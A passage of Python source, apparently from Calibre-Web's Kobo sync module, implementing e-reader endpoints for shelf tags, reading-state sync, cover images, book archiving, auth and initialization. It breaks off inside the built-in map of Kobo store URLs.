        ub.session.add(shelf)
    items_unknown_to_calibre = add_items_to_shelf(items, shelf)
    if items_unknown_to_calibre:
        log.debug("Received request to add unknown books to a collection. Silently ignoring items.")
    ub.session_commit()
    return make_response(jsonify(str(shelf.uuid)), 201)
@kobo.route("/v1/library/tags/<tag_id>", methods=["DELETE", "PUT"])
@requires_kobo_auth
def HandleTagUpdate(tag_id):
    """Rename (PUT) or delete (DELETE) the shelf backing the Kobo tag *tag_id*."""
    shelf = ub.session.query(ub.Shelf).filter(ub.Shelf.uuid == tag_id,
                                              ub.Shelf.user_id == current_user.id).one_or_none()
    if not shelf:
        log.debug("Received Kobo tag update request on a collection unknown to CalibreWeb")
        # An unknown collection may belong to the official store when proxying.
        if config.config_kobo_proxy:
            return redirect_or_proxy_request()
        else:
            abort(404, description="Collection isn't known to CalibreWeb")
    if not shelf_lib.check_shelf_edit_permissions(shelf):
        abort(401, description="User is unauthaurized to edit shelf.")
    if request.method == "DELETE":
        shelf_lib.delete_shelf_helper(shelf)
    else:
        name = None
        try:
            shelf_request = request.json
            name = shelf_request["Name"]
        except (KeyError, TypeError):
            log.debug("Received malformed v1/library/tags rename request.")
            abort(400, description="Malformed tags POST request. Data is missing 'Name' field")
        shelf.name = name
        ub.session.merge(shelf)
        ub.session_commit()
    return make_response(' ', 200)
def add_items_to_shelf(items, shelf):
    """Append the Kobo tag *items* to *shelf*, skipping books already on it.

    Returns the subset of items that could not be matched to a Calibre book
    (wrong item type, unknown RevisionId, or malformed entry).
    """
    existing_ids = {entry.book_id for entry in shelf.books}
    unmatched = []
    for item in items:
        try:
            if item["Type"] != "ProductRevisionTagItem":
                unmatched.append(item)
                continue
            book = calibre_db.get_book_by_uuid(item["RevisionId"])
            if not book:
                unmatched.append(item)
                continue
            if book.id not in existing_ids:
                shelf.books.append(ub.BookShelf(book_id=book.id))
        except KeyError:
            unmatched.append(item)
    return unmatched
@csrf.exempt
@kobo.route("/v1/library/tags/<tag_id>/items", methods=["POST"])
@requires_kobo_auth
def HandleTagAddItem(tag_id):
    """Add the posted items to the shelf backing the Kobo tag *tag_id*; respond 201."""
    items = None
    try:
        tag_request = request.json
        items = tag_request["Items"]
    except (KeyError, TypeError):
        # NOTE(review): message mentions "items/delete" although this is the add route.
        log.debug("Received malformed v1/library/tags/<tag_id>/items/delete request.")
        abort(400, description="Malformed tags POST request. Data is missing 'Items' field")
    shelf = ub.session.query(ub.Shelf).filter(ub.Shelf.uuid == tag_id,
                                              ub.Shelf.user_id == current_user.id).one_or_none()
    if not shelf:
        log.debug("Received Kobo request on a collection unknown to CalibreWeb")
        abort(404, description="Collection isn't known to CalibreWeb")
    if not shelf_lib.check_shelf_edit_permissions(shelf):
        abort(401, description="User is unauthaurized to edit shelf.")
    items_unknown_to_calibre = add_items_to_shelf(items, shelf)
    if items_unknown_to_calibre:
        log.debug("Received request to add an unknown book to a collection. Silently ignoring item.")
    ub.session.merge(shelf)
    ub.session_commit()
    return make_response('', 201)
@csrf.exempt
@kobo.route("/v1/library/tags/<tag_id>/items/delete", methods=["POST"])
@requires_kobo_auth
def HandleTagRemoveItem(tag_id):
    """Remove the posted items from the shelf backing the Kobo tag *tag_id*; respond 200."""
    items = None
    try:
        tag_request = request.json
        items = tag_request["Items"]
    except (KeyError, TypeError):
        log.debug("Received malformed v1/library/tags/<tag_id>/items/delete request.")
        abort(400, description="Malformed tags POST request. Data is missing 'Items' field")
    shelf = ub.session.query(ub.Shelf).filter(ub.Shelf.uuid == tag_id,
                                              ub.Shelf.user_id == current_user.id).one_or_none()
    if not shelf:
        log.debug(
            "Received a request to remove an item from a Collection unknown to CalibreWeb.")
        abort(404, description="Collection isn't known to CalibreWeb")
    if not shelf_lib.check_shelf_edit_permissions(shelf):
        abort(401, description="User is unauthaurized to edit shelf.")
    # Items that cannot be matched to a Calibre book are collected and ignored.
    items_unknown_to_calibre = []
    for item in items:
        try:
            if item["Type"] != "ProductRevisionTagItem":
                items_unknown_to_calibre.append(item)
                continue
            book = calibre_db.get_book_by_uuid(item["RevisionId"])
            if not book:
                items_unknown_to_calibre.append(item)
                continue
            shelf.books.filter(ub.BookShelf.book_id == book.id).delete()
        except KeyError:
            items_unknown_to_calibre.append(item)
    ub.session_commit()
    if items_unknown_to_calibre:
        log.debug("Received request to remove an unknown book to a collecition. Silently ignoring item.")
    return make_response('', 200)
# Add new, changed, or deleted shelves to the sync_results.
# Note: Public shelves that aren't owned by the user aren't supported.
def sync_shelves(sync_token, sync_results, only_kobo_shelves=False):
    """Append tag (shelf) changes since the last sync to *sync_results*.

    Emits "DeletedTag" entries for archived shelves (and, when only
    kobo-sync shelves are synced, for shelves whose kobo_sync flag was
    switched off), then "NewTag"/"ChangedTag" entries for created or
    modified shelves.  Advances sync_token.tags_last_modified and commits
    the user-db session.
    """
    new_tags_last_modified = sync_token.tags_last_modified
    # Shelves the user deleted since the last sync -> tell the device to drop them.
    for shelf in ub.session.query(ub.ShelfArchive).filter(
        func.datetime(ub.ShelfArchive.last_modified) > sync_token.tags_last_modified,
        ub.ShelfArchive.user_id == current_user.id
    ):
        new_tags_last_modified = max(shelf.last_modified, new_tags_last_modified)
        sync_results.append({
            "DeletedTag": {
                "Tag": {
                    "Id": shelf.uuid,
                    "LastModified": convert_to_kobo_timestamp_string(shelf.last_modified)
                }
            }
        })
    extra_filters = []
    if only_kobo_shelves:
        # Shelves recently excluded from Kobo sync must also disappear from the
        # device.  BUGFIX: the previous `not ub.Shelf.kobo_sync` was evaluated by
        # Python at query-build time (object truthiness), not translated to SQL
        # NOT, so this filter never matched; an explicit comparison is required.
        for shelf in ub.session.query(ub.Shelf).filter(
                func.datetime(ub.Shelf.last_modified) > sync_token.tags_last_modified,
                ub.Shelf.user_id == current_user.id,
                ub.Shelf.kobo_sync == False  # pylint: disable=singleton-comparison
        ):
            sync_results.append({
                "DeletedTag": {
                    "Tag": {
                        "Id": shelf.uuid,
                        "LastModified": convert_to_kobo_timestamp_string(shelf.last_modified)
                    }
                }
            })
        extra_filters.append(ub.Shelf.kobo_sync)
    # Shelves created/changed (or with newly added books) since the last sync.
    if sqlalchemy_version2:
        shelflist = ub.session.execute(select(ub.Shelf).outerjoin(ub.BookShelf).filter(
            or_(func.datetime(ub.Shelf.last_modified) > sync_token.tags_last_modified,
                func.datetime(ub.BookShelf.date_added) > sync_token.tags_last_modified),
            ub.Shelf.user_id == current_user.id,
            *extra_filters
        ).distinct().order_by(func.datetime(ub.Shelf.last_modified).asc())).columns(ub.Shelf)
    else:
        shelflist = ub.session.query(ub.Shelf).outerjoin(ub.BookShelf).filter(
            or_(func.datetime(ub.Shelf.last_modified) > sync_token.tags_last_modified,
                func.datetime(ub.BookShelf.date_added) > sync_token.tags_last_modified),
            ub.Shelf.user_id == current_user.id,
            *extra_filters
        ).distinct().order_by(func.datetime(ub.Shelf.last_modified).asc())
    for shelf in shelflist:
        if not shelf_lib.check_shelf_view_permissions(shelf):
            continue
        new_tags_last_modified = max(shelf.last_modified, new_tags_last_modified)
        tag = create_kobo_tag(shelf)
        if not tag:
            continue
        # Shelves created after the watermark are new to the device.
        if shelf.created > sync_token.tags_last_modified:
            sync_results.append({
                "NewTag": tag
            })
        else:
            sync_results.append({
                "ChangedTag": tag
            })
    sync_token.tags_last_modified = new_tags_last_modified
    ub.session_commit()
def create_kobo_tag(shelf):
    """Translate a ub.Shelf into the Kobo "Tag" payload, listing its known books."""
    tag = {
        "Created": convert_to_kobo_timestamp_string(shelf.created),
        "Id": shelf.uuid,
        "Items": [],
        "LastModified": convert_to_kobo_timestamp_string(shelf.last_modified),
        "Name": shelf.name,
        "Type": "UserTag"
    }
    for entry in shelf.books:
        book = calibre_db.get_book(entry.book_id)
        if book:
            tag["Items"].append({
                "RevisionId": book.uuid,
                "Type": "ProductRevisionTagItem"
            })
        else:
            # Shelf entries pointing at books missing from the library are skipped.
            log.info(u"Book (id: %s) in BookShelf (id: %s) not found in book database", entry.book_id, shelf.id)
    return {"Tag": tag}
@kobo.route("/v1/library/<book_uuid>/state", methods=["GET", "PUT"])
@requires_kobo_auth
def HandleStateRequest(book_uuid):
    """Read (GET) or update (PUT) the Kobo reading state for one book.

    PUT merges the device's bookmark, reading statistics and read status
    into the locally stored KoboReadingState; malformed payloads abort
    with HTTP 400 after rolling back the session.
    """
    book = calibre_db.get_book_by_uuid(book_uuid)
    if not book or not book.data:
        log.info(u"Book %s not found in database", book_uuid)
        # Unknown book: proxy to the Kobo store (or return {}) instead of failing.
        return redirect_or_proxy_request()
    kobo_reading_state = get_or_create_reading_state(book.id)
    if request.method == "GET":
        return jsonify([get_kobo_reading_state_response(book, kobo_reading_state)])
    else:
        update_results_response = {"EntitlementId": book_uuid}
        try:
            request_data = request.json
            # Kobo sends a list of reading states; only the first entry is used.
            request_reading_state = request_data["ReadingStates"][0]
            request_bookmark = request_reading_state["CurrentBookmark"]
            if request_bookmark:
                current_bookmark = kobo_reading_state.current_bookmark
                current_bookmark.progress_percent = request_bookmark["ProgressPercent"]
                current_bookmark.content_source_progress_percent = request_bookmark["ContentSourceProgressPercent"]
                location = request_bookmark["Location"]
                if location:
                    current_bookmark.location_value = location["Value"]
                    current_bookmark.location_type = location["Type"]
                    current_bookmark.location_source = location["Source"]
                update_results_response["CurrentBookmarkResult"] = {"Result": "Success"}
            request_statistics = request_reading_state["Statistics"]
            if request_statistics:
                statistics = kobo_reading_state.statistics
                statistics.spent_reading_minutes = int(request_statistics["SpentReadingMinutes"])
                statistics.remaining_time_minutes = int(request_statistics["RemainingTimeMinutes"])
                update_results_response["StatisticsResult"] = {"Result": "Success"}
            request_status_info = request_reading_state["StatusInfo"]
            if request_status_info:
                book_read = kobo_reading_state.book_read_link
                new_book_read_status = get_ub_read_status(request_status_info["Status"])
                # Count a new "started reading" only on a transition INTO in-progress.
                if new_book_read_status == ub.ReadBook.STATUS_IN_PROGRESS \
                        and new_book_read_status != book_read.read_status:
                    book_read.times_started_reading += 1
                    book_read.last_time_started_reading = datetime.datetime.utcnow()
                book_read.read_status = new_book_read_status
                update_results_response["StatusInfoResult"] = {"Result": "Success"}
        except (KeyError, TypeError, ValueError, StatementError):
            log.debug("Received malformed v1/library/<book_uuid>/state request.")
            ub.session.rollback()
            abort(400, description="Malformed request data is missing 'ReadingStates' key")
        ub.session.merge(kobo_reading_state)
        ub.session_commit()
        return jsonify({
            "RequestResult": "Success",
            "UpdateResults": [update_results_response],
        })
def get_read_status_for_kobo(ub_book_read):
    """Translate a ub.ReadBook status enum value into the Kobo status string."""
    status_to_kobo = {
        ub.ReadBook.STATUS_FINISHED: "Finished",
        ub.ReadBook.STATUS_IN_PROGRESS: "Reading",
        ub.ReadBook.STATUS_UNREAD: "ReadyToRead",
        None: "ReadyToRead",
    }
    return status_to_kobo[ub_book_read.read_status]
def get_ub_read_status(kobo_read_status):
    """Translate a Kobo status string into the ub.ReadBook status enum (or None)."""
    kobo_to_status = {
        "Finished": ub.ReadBook.STATUS_FINISHED,
        "Reading": ub.ReadBook.STATUS_IN_PROGRESS,
        "ReadyToRead": ub.ReadBook.STATUS_UNREAD,
        None: None,
    }
    return kobo_to_status[kobo_read_status]
def add_synced_books(book_id):
    """Record that book_id has been delivered to the current user's Kobo device."""
    synced_entry = ub.KoboSyncedBooks()
    synced_entry.user_id = current_user.id
    synced_entry.book_id = book_id
    ub.session.add(synced_entry)
    try:
        ub.session.commit()
    except Exception:
        # Best effort: a failed commit (e.g. duplicate row) is rolled back silently.
        ub.session.rollback()
def get_or_create_reading_state(book_id):
    """Return the KoboReadingState for (current user, book_id), creating the
    ReadBook row and an empty reading state on first access."""
    book_read = ub.session.query(ub.ReadBook).filter(ub.ReadBook.book_id == book_id,
                                                     ub.ReadBook.user_id == current_user.id).one_or_none()
    if not book_read:
        book_read = ub.ReadBook(user_id=current_user.id, book_id=book_id)
    if not book_read.kobo_reading_state:
        # First sync for this book: start with empty bookmark and statistics.
        kobo_reading_state = ub.KoboReadingState(user_id=book_read.user_id, book_id=book_id)
        kobo_reading_state.current_bookmark = ub.KoboBookmark()
        kobo_reading_state.statistics = ub.KoboStatistics()
        book_read.kobo_reading_state = kobo_reading_state
    ub.session.add(book_read)
    ub.session_commit()
    return book_read.kobo_reading_state
def get_kobo_reading_state_response(book, kobo_reading_state):
    """Assemble the full ReadingState payload Kobo expects for one book."""
    ts = convert_to_kobo_timestamp_string
    return {
        "EntitlementId": book.uuid,
        "Created": ts(book.timestamp),
        "LastModified": ts(kobo_reading_state.last_modified),
        # AFAICT PriorityTimestamp is always equal to LastModified.
        "PriorityTimestamp": ts(kobo_reading_state.priority_timestamp),
        "StatusInfo": get_status_info_response(kobo_reading_state.book_read_link),
        "Statistics": get_statistics_response(kobo_reading_state.statistics),
        "CurrentBookmark": get_current_bookmark_response(kobo_reading_state.current_bookmark),
    }
def get_status_info_response(book_read):
    """Build the StatusInfo section of a Kobo reading-state response."""
    status_info = {
        "LastModified": convert_to_kobo_timestamp_string(book_read.last_modified),
        "Status": get_read_status_for_kobo(book_read),
        "TimesStartedReading": book_read.times_started_reading,
    }
    last_started = book_read.last_time_started_reading
    if last_started:
        status_info["LastTimeStartedReading"] = convert_to_kobo_timestamp_string(last_started)
    return status_info
def get_statistics_response(statistics):
    """Build the Statistics section; unset (falsy) values are omitted."""
    stats_response = {
        "LastModified": convert_to_kobo_timestamp_string(statistics.last_modified),
    }
    for key, value in (
        ("SpentReadingMinutes", statistics.spent_reading_minutes),
        ("RemainingTimeMinutes", statistics.remaining_time_minutes),
    ):
        if value:
            stats_response[key] = value
    return stats_response
def get_current_bookmark_response(current_bookmark):
    """Build the CurrentBookmark section; unset progress/location fields are omitted."""
    bookmark_response = {
        "LastModified": convert_to_kobo_timestamp_string(current_bookmark.last_modified),
    }
    for key, value in (
        ("ProgressPercent", current_bookmark.progress_percent),
        ("ContentSourceProgressPercent", current_bookmark.content_source_progress_percent),
    ):
        if value:
            bookmark_response[key] = value
    if current_bookmark.location_value:
        bookmark_response["Location"] = {
            "Value": current_bookmark.location_value,
            "Type": current_bookmark.location_type,
            "Source": current_bookmark.location_source,
        }
    return bookmark_response
@kobo.route("/<book_uuid>/<width>/<height>/<isGreyscale>/image.jpg", defaults={'Quality': ""})
@kobo.route("/<book_uuid>/<width>/<height>/<Quality>/<isGreyscale>/image.jpg")
@requires_kobo_auth
def HandleCoverImageRequest(book_uuid, width, height,Quality, isGreyscale):
    """Serve a book cover; unknown books are proxied to Kobo when enabled."""
    book_cover = helper.get_book_cover_with_uuid(
        book_uuid, use_generic_cover_on_failure=False
    )
    if book_cover:
        log.debug("Cover request received for book %s" % book_uuid)
        return book_cover
    if config.config_kobo_proxy:
        log.debug("Cover for unknown book: %s proxied to kobo" % book_uuid)
        proxied_url = KOBO_IMAGEHOST_URL + "/{book_uuid}/{width}/{height}/false/image.jpg".format(
            book_uuid=book_uuid, width=width, height=height)
        return redirect(proxied_url, 307)
    log.debug("Cover for unknown book: %s requested" % book_uuid)
    # An additional proxy round-trip makes no sense here -> direct empty reply.
    return make_response(jsonify({}))
@kobo.route("")
def TopLevelEndpoint():
    """Answer the bare /kobo/<token> endpoint with an empty JSON object."""
    empty_payload = jsonify({})
    return make_response(empty_payload)
@kobo.route("/v1/library/<book_uuid>", methods=["DELETE"])
@requires_kobo_auth
def HandleBookDeletionRequest(book_uuid):
    """Handle a device-side book deletion by archiving the book locally.

    The book is NOT removed from the library; only the per-user
    ArchivedBook flag is set so it disappears from future syncs.
    """
    log.info("Kobo book deletion request received for book %s" % book_uuid)
    book = calibre_db.get_book_by_uuid(book_uuid)
    if not book:
        log.info(u"Book %s not found in database", book_uuid)
        return redirect_or_proxy_request()
    book_id = book.id
    archived_book = (
        ub.session.query(ub.ArchivedBook)
        .filter(ub.ArchivedBook.book_id == book_id)
        .first()
    )
    if not archived_book:
        archived_book = ub.ArchivedBook(user_id=current_user.id, book_id=book_id)
    archived_book.is_archived = True
    archived_book.last_modified = datetime.datetime.utcnow()
    ub.session.merge(archived_book)
    ub.session_commit()
    # 204 No Content is what the device expects on success.
    return ("", 204)
# TODO: Implement the following routes
@kobo.route("/v1/library/<dummy>", methods=["DELETE", "GET"])
def HandleUnimplementedRequest(dummy=None):
    """Stub for library endpoints we do not implement: log and proxy/ignore."""
    log.debug("Unimplemented Library Request received: %s", request.base_url)
    return redirect_or_proxy_request()
# TODO: Implement the following routes
@csrf.exempt
@kobo.route("/v1/user/loyalty/<dummy>", methods=["GET", "POST"])
@kobo.route("/v1/user/profile", methods=["GET", "POST"])
@kobo.route("/v1/user/wishlist", methods=["GET", "POST"])
@kobo.route("/v1/user/recommendations", methods=["GET", "POST"])
@kobo.route("/v1/analytics/<dummy>", methods=["GET", "POST"])
def HandleUserRequest(dummy=None):
    """Stub for user/analytics endpoints: log and proxy/ignore."""
    log.debug("Unimplemented User Request received: %s", request.base_url)
    return redirect_or_proxy_request()
@csrf.exempt
@kobo.route("/v1/products/<dummy>/prices", methods=["GET", "POST"])
@kobo.route("/v1/products/<dummy>/recommendations", methods=["GET", "POST"])
@kobo.route("/v1/products/<dummy>/nextread", methods=["GET", "POST"])
@kobo.route("/v1/products/<dummy>/reviews", methods=["GET", "POST"])
@kobo.route("/v1/products/books/external/<dummy>", methods=["GET", "POST"])
@kobo.route("/v1/products/books/series/<dummy>", methods=["GET", "POST"])
@kobo.route("/v1/products/books/<dummy>", methods=["GET", "POST"])
@kobo.route("/v1/products/dailydeal", methods=["GET", "POST"])
@kobo.route("/v1/products", methods=["GET", "POST"])
def HandleProductsRequest(dummy=None):
    """Stub for store product endpoints: log and proxy/ignore."""
    log.debug("Unimplemented Products Request received: %s", request.base_url)
    return redirect_or_proxy_request()
def make_calibre_web_auth_response():
    """Return a dummy auth payload for the Kobo device.

    As described in kobo_auth.py, CalibreWeb makes no practical use of the
    auth/device API for authentication or authorization; random tokens are
    returned just to keep the device happy.
    """
    content = request.get_json()

    def random_token():
        return base64.b64encode(os.urandom(24)).decode('utf-8')

    payload = {
        "AccessToken": random_token(),
        "RefreshToken": random_token(),
        "TokenType": "Bearer",
        "TrackingId": str(uuid.uuid4()),
        "UserKey": content['UserKey'],
    }
    return make_response(jsonify(payload))
@csrf.exempt
@kobo.route("/v1/auth/device", methods=["POST"])
@requires_kobo_auth
def HandleAuthRequest():
    """Answer the device auth handshake: proxy to Kobo when configured,
    falling back to a locally generated dummy token response."""
    log.debug('Kobo Auth request')
    if config.config_kobo_proxy:
        try:
            return redirect_or_proxy_request()
        except Exception:
            log.error("Failed to receive or parse response from Kobo's auth endpoint. Falling back to un-proxied mode.")
    return make_calibre_web_auth_response()
@kobo.route("/v1/initialization")
@requires_kobo_auth
def HandleInitRequest():
    """Answer the Kobo device initialization request.

    Returns the resource/endpoint map the device will use. When proxying
    is enabled the map is fetched from Kobo's own init endpoint; otherwise
    (or on failure) the built-in NATIVE_KOBO_RESOURCES map is used. In
    both cases the image host and cover-image URL templates are rewritten
    to point back at this server.
    """
    log.info('Init')
    kobo_resources = None
    if config.config_kobo_proxy:
        try:
            store_response = make_request_to_kobo_store()
            store_response_json = store_response.json()
            if "Resources" in store_response_json:
                kobo_resources = store_response_json["Resources"]
        except Exception:
            log.error("Failed to receive or parse response from Kobo's init endpoint. Falling back to un-proxied mode.")
    if not kobo_resources:
        kobo_resources = NATIVE_KOBO_RESOURCES()
    if not current_app.wsgi_app.is_proxied:
        log.debug('Kobo: Received unproxied request, changed request port to external server port')
        # Strip the port from the host header (but not from a bare IPv6 literal).
        if ':' in request.host and not request.host.endswith(']'):
            host = "".join(request.host.split(':')[:-1])
        else:
            host = request.host
        calibre_web_url = "{url_scheme}://{url_base}:{url_port}".format(
            url_scheme=request.scheme,
            url_base=host,
            url_port=config.config_external_port
        )
        log.debug('Kobo: Received unproxied request, changed request url to %s', calibre_web_url)
        kobo_resources["image_host"] = calibre_web_url
        kobo_resources["image_url_quality_template"] = unquote(calibre_web_url +
                                                               url_for("kobo.HandleCoverImageRequest",
                                                                       auth_token=kobo_auth.get_auth_token(),
                                                                       book_uuid="{ImageId}",
                                                                       width="{width}",
                                                                       height="{height}",
                                                                       Quality='{Quality}',
                                                                       isGreyscale='isGreyscale'))
        kobo_resources["image_url_template"] = unquote(calibre_web_url +
                                                       url_for("kobo.HandleCoverImageRequest",
                                                               auth_token=kobo_auth.get_auth_token(),
                                                               book_uuid="{ImageId}",
                                                               width="{width}",
                                                               height="{height}",
                                                               isGreyscale='false'))
    else:
        kobo_resources["image_host"] = url_for("web.index", _external=True).strip("/")
        kobo_resources["image_url_quality_template"] = unquote(url_for("kobo.HandleCoverImageRequest",
                                                                       auth_token=kobo_auth.get_auth_token(),
                                                                       book_uuid="{ImageId}",
                                                                       width="{width}",
                                                                       height="{height}",
                                                                       Quality='{Quality}',
                                                                       isGreyscale='isGreyscale',
                                                                       _external=True))
        kobo_resources["image_url_template"] = unquote(url_for("kobo.HandleCoverImageRequest",
                                                               auth_token=kobo_auth.get_auth_token(),
                                                               book_uuid="{ImageId}",
                                                               width="{width}",
                                                               height="{height}",
                                                               isGreyscale='false',
                                                               _external=True))
    response = make_response(jsonify({"Resources": kobo_resources}))
    # The device requires this header; "e30=" is base64 of "{}".
    response.headers["x-kobo-apitoken"] = "e30="
    return response
@kobo.route("/download/<book_id>/<book_format>")
@requires_kobo_auth
@download_required
def download_book(book_id, book_format):
    """Serve a book download to the Kobo device via the shared download helper."""
    return get_download_link(book_id, book_format, "kobo")
def NATIVE_KOBO_RESOURCES():
    """Return the built-in Kobo resource/endpoint map.

    Used by HandleInitRequest when the real Kobo init endpoint is not
    proxied or cannot be reached; image URLs in this map are rewritten
    by the caller to point at this server.
    """
    return {
        "account_page": "https://secure.kobobooks.com/profile",
        "account_page_rakuten": "https://my.rakuten.co.jp/",
        "add_entitlement": "https://storeapi.kobo.com/v1/library/{RevisionIds}",
        "affiliaterequest": "https://storeapi.kobo.com/v1/affiliate",
        "audiobook_subscription_orange_deal_inclusion_url": "https://authorize.kobo.com/inclusion",
        "authorproduct_recommendations": "https://storeapi.kobo.com/v1/products/books/authors/recommendations",
        "autocomplete": "https://storeapi.kobo.com/v1/products/autocomplete",
        "blackstone_header": {"key": "x-amz-request-payer", "value": "requester"},
        "book": "https://storeapi.kobo.com/v1/products/books/{ProductId}",
        "book_detail_page": "https://store.kobobooks.com/{culture}/ebook/{slug}",
        "book_detail_page_rakuten": "https://books.rakuten.co.jp/rk/{crossrevisionid}",
        "book_landing_page": "https://store.kobobooks.com/ebooks",
        "book_subscription": "https://storeapi.kobo.com/v1/products/books/subscriptions",
        "categories": "https://storeapi.kobo.com/v1/categories",
        "categories_page": "https://store.kobobooks.com/ebooks/categories",
        "category": "https://storeapi.kobo.com/v1/categories/{CategoryId}",
        "category_featured_lists": "https://storeapi.kobo.com/v1/categories/{CategoryId}/featured",
        "category_products": "https://storeapi.kobo.com/v1/categories/{CategoryId}/products",
        "checkout_borrowed_book": "https://storeapi.kobo.com/v1/library/borrow",
        "configuration_data": "https://storeapi.kobo.com/v1/configuration",
        "content_access_book": "https://storeapi.kobo.com/v1/products/books/{ProductId}/access",
        "customer_care_live_chat": "https://v2.zopim.com/widget/livechat.html?key=Y6gwUmnu4OATxN3Tli4Av9bYN319BTdO",
        "daily_deal": "https://storeapi.kobo.com/v1/products/dailydeal",
        "deals": "https://storeapi.kobo.com/v1/deals",
        "delete_entitlement": "https://storeapi.kobo.com/v1/library/{Ids}",
        "delete_tag": "https://storeapi.kobo.com/v1/library/tags/{TagId}",
        "delete_tag_items": "https://storeapi.kobo.com/v1/library/tags/{TagId}/items/delete",
        "device_auth": "https://storeapi.kobo.com/v1/auth/device",
        "device_refresh": "https://storeapi.kobo.com/v1/auth/refresh",
        "dictionary_host": "https://kbdownload1-a.akamaihd.net",
        "discovery_host": "https://discovery.kobobooks.com",
        "eula_page": "https://www.kobo.com/termsofuse?style=onestore",
        "exchange_auth": "https://storeapi.kobo.com/v1/auth/exchange",
        "external_book": "https://storeapi.kobo.com/v1/products/books/external/{Ids}",
        "facebook_sso_page": "https://authorize.kobo.com/signin/provider/Facebook/login?returnUrl=http://store.kobobooks.com/",
        "featured_list": "https://storeapi.kobo.com/v1/products/featured/{FeaturedListId}",
        "featured_lists": "https://storeapi.kobo.com/v1/products/featured",
        "free_books_page": {
            "EN": "https://www.kobo.com/{region}/{language}/p/free-ebooks",
            "FR": "https://www.kobo.com/{region}/{language}/p/livres-gratuits",
            "IT": "https://www.kobo.com/{region}/{language}/p/libri-gratuiti",
            "NL": "https://www.kobo.com/{region}/{language}/List/bekijk-het-overzicht-van-gratis-ebooks/QpkkVWnUw8sxmgjSlCbJRg",
            "PT": "https://www.kobo.com/{region}/{language}/p/livros-gratis",
        },
        "fte_feedback": "https://storeapi.kobo.com/v1/products/ftefeedback",
        "get_tests_request": "https://storeapi.kobo.com/v1/analytics/gettests",
        "giftcard_epd_redeem_url": "https://www.kobo.com/{storefront}/{language}/redeem-ereader",
        "giftcard_redeem_url": "https://www.kobo.com/{storefront}/{language}/redeem",
        "help_page": "https://www.kobo.com/help",
        "kobo_audiobooks_enabled": "False",
        "kobo_audiobooks_orange_deal_enabled": "False",
        "kobo_audiobooks_subscriptions_enabled": "False",
        "kobo_nativeborrow_enabled": "True",
        "kobo_onestorelibrary_enabled": "False",
        "kobo_redeem_enabled": "True",
        "kobo_shelfie_enabled": "False",
        "kobo_subscriptions_enabled": "False",
        "kobo_superpoints_enabled": "False",
        "kobo_wishlist_enabled": "True",
        "library_book": "https://storeapi.kobo.com/v1/user/library/books/{LibraryItemId}",
        "library_items": "https://storeapi.kobo.com/v1/user/library",
        "library_metadata": "https://storeapi.kobo.com/v1/library/{Ids}/metadata",
        "library_prices": "https://storeapi.kobo.com/v1/user/library/previews/prices",
        "library_stack": "https://storeapi.kobo.com/v1/user/library/stacks/{LibraryItemId}",
        "library_sync": "https://storeapi.kobo.com/v1/library/sync",
        "love_dashboard_page": "https://store.kobobooks.com/{culture}/kobosuperpoints",
        "love_points_redemption_page": "https://store.kobobooks.com/{culture}/KoboSuperPointsRedemption?productId={ProductId}",
        "magazine_landing_page": "https://store.kobobooks.com/emagazines",
        "notifications_registration_issue": "https://storeapi.kobo.com/v1/notifications/registration",
        "oauth_host": "https://oauth.kobo.com",
        "overdrive_account": "https://auth.overdrive.com/account",
        "overdrive_library": "https://{libraryKey}.auth.overdrive.com/library",
        "overdrive_library_finder_host": "https://libraryfinder.api.overdrive.com",
        "overdrive_thunder_host": "https://thunder.api.overdrive.com",
        "password_retrieval_page": "https://www.kobobooks.com/passwordretrieval.html",
        "post_analytics_event": "https://storeapi.kobo.com/v1/analytics/event",
        "privacy_page": "https://www.kobo.com/privacypolicy?style=onestore",
        "product_nextread": "https://storeapi.kobo.com/v1/products/{ProductIds}/nextread",
        "product_prices": "https://storeapi.kobo.com/v1/products/{ProductIds}/prices",
        "product_recommendations": "https://storeapi.kobo.com/v1/products/{ProductId}/recommendations",
        "product_reviews": "https://storeapi.kobo.com/v1/products/{ProductIds}/reviews",
        "products": "https://storeapi.kobo.com/v1/products",
        "provider_external_sign_in_page": "https://authorize.kobo.com/ExternalSignIn/{providerName}?returnUrl=http://store.kobobooks.com/",
        "purchase_buy": "https://www.kobo.com/checkout/createpurchase/",
        "purchase_buy_templated": "https://www.kobo.com/{culture}/checkout/createpurchase/{ProductId}",
        "quickbuy_checkout": "https://storeapi.kobo.com/v1/store/quickbuy/{PurchaseId}/checkout",
        "quickbuy_create": "https://storeapi.kobo.com/v1/store/quickbuy/purchase",
        "rating": "https://storeapi.kobo.com/v1/products/{ProductId}/rating/{Rating}",
        "reading_state": "https://storeapi.kobo.com/v1/library/{Ids}/state",
        "redeem_interstitial_page": "https://store.kobobooks.com",
        "registration_page": "https://authorize.kobo.com/signup?returnUrl=http://store.kobobooks.com/",
        "related_items": "https://storeapi.kobo.com/v1/products/{Id}/related",
        "remaining_book_series": "https://storeapi.kobo.com/v1/products/books/series/{SeriesId}",
        "rename_tag": "https://storeapi.kobo.com/v1/library/tags/{TagId}",
        "review": "https://storeapi.kobo.com/v1/products/reviews/{ReviewId}",
        "review_sentiment": "https://storeapi.kobo.com/v1/products/reviews/{ReviewId}/sentiment/{Sentiment}",
        "shelfie_recommendations": "https://storeapi.kobo.com/v1/user/recommendations/shelfie",
        "sign_in_page": "https://authorize.kobo.com/signin?returnUrl=http://store.kobobooks.com/",
        "social_authorization_host": "https://social.kobobooks.com:8443",
        "social_host": "https://social.kobobooks.com",
        "stacks_host_productId": "https://store.kobobooks.com/collections/byproductid/",
        "store_home": "www.kobo.com/{region}/{language}",
        "store_host": "store.kobobooks.com",
        "store_newreleases": "https://store.kobobooks.com/{culture}/List/new-releases/961XUjtsU0qxkFItWOutGA",
        "store_search": "https://store.kobobooks.com/{culture}/Search?Query={query}",
        "store_top50": "https://store.kobobooks.com/{culture}/ebooks/Top",
        "tag_items": "https://storeapi.kobo.com/v1/library/tags/{TagId}/Items",
        "tags": "https://storeapi.kobo.com/v1/library/tags",
        "taste_profile": "https://storeapi.kobo.com/v1/products/tasteprofile",
        "update_accessibility_to_preview": "https://storeapi.kobo.com/v1/library/{EntitlementIds}/preview",
        "use_one_store": "False",
        "user_loyalty_benefits": "https://storeapi.kobo.com/v1/user/loyalty/benefits",
        "user_platform": "https://storeapi.kobo.com/v1/user/platform",
        "user_profile": "https://storeapi.kobo.com/v1/user/profile",
        "user_ratings": "https://storeapi.kobo.com/v1/user/ratings",
        "user_recommendations": "https://storeapi.kobo.com/v1/user/recommendations",
        "user_reviews": "https://storeapi.kobo.com/v1/user/reviews",
        "user_wishlist": "https://storeapi.kobo.com/v1/user/wishlist",
